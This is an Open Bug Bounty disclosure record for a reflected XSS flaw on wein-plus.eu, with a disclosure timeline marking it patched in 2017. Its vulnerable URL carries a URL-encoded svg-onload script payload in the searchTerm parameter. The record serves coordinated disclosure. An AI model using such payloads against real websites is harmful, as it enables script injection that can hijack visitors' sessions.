wein-plus.eu XSS vulnerability

2015-12-09T20:26:00
ID OBB:115074
Type openbugbounty
Reporter krankoPwnz
Modified 2017-07-26T10:57:00

Description

Vulnerable URL:
http://www.wein-plus.eu/de/Weinführer_2.html?searchTerm=asd%22%3E%3Csvg%20onload%3Dalert%28%2fXSSPOSED%2f%29%3E&searchType;=producer&showResults;=1&sel;_land=&km;=100&ort;=&verband;=&klass;_von=5&exhibitor;_convention=0
Details:

Description| Value
---|---
Patched:| Yes, at 26.07.2017
Latest check for patch:| 26.07.2017 10:57 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 268267
Google Pagerank| 4
VIP website status:| No
Check wein-plus.eu SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 9 December, 2015 20:26 GMT
Vulnerability existence verified and confirmed| 9 December, 2015 20:29 GMT
Vulnerability patched by the website owner| 26 July, 2017 10:57 GMT